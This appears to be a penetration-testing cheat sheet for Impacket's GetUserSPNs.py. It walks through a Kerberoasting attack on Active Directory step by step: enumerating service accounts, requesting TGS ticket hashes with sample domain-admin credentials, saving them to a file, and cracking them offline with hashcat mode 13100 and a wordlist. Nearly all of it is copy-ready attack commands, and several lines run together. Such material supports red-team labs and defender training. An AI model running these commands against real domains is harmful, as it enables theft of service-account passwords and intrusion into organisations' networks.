Impacket-GetUserSPNs
GetUserSPNs.py is a script from impacket toolkit that is used to enumerate Service Principal Names(SPNs) from an Active Directory enviornment. It is commonly used in Kerberoasting attacks to request and extracrt kerberos service ticket hashes(TGS) for offline cracking
Installation
if impacket is not already installed
git clone https://github.com/fortra/impacket.gitcd impacketpython3 -m pip installBasic Usage Without Authentication
Enumerate SPNs anonymously (if allowed)
python3 GetUserSPNs.py infosecwarrior.local/ -dc-ip <IP>Authenticated SPN Enumeration
Authenticate as domain user to get SPNs with RC4 hashes.
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP>Use a Custom User List
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -usersfile username.txt Request Service Tickets
add the -request flag to request TGS tickets for crackable hashes
pyhton3 GetUserSPNs.py infosecwarrior.local/ -dc-ip <IP> -requestwith credentials
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -requestUse with User File + Request Hashes
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -usersfile username.txt -requestOutput hashes to File
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -request -outputfile kerberoasting-hash.txtCrack Hashes woth hashcat
use hashmode 13100 for kerberos 5 TGS-REP etype 23 hashes
hashcat -a 0 -m 13100 kerberoasting-hash.txt /opt/rockyou.txt Notes
Only accounts with SPNs and RC4_HMAC (etype 23) can be roasted.
TGS hashes are crackable offlie and may revel plaintext passwords of service accounts
SPNs typically follow formats like
HTTP/servername.domain.local
MSSQLSvc/servername:1433
Last updated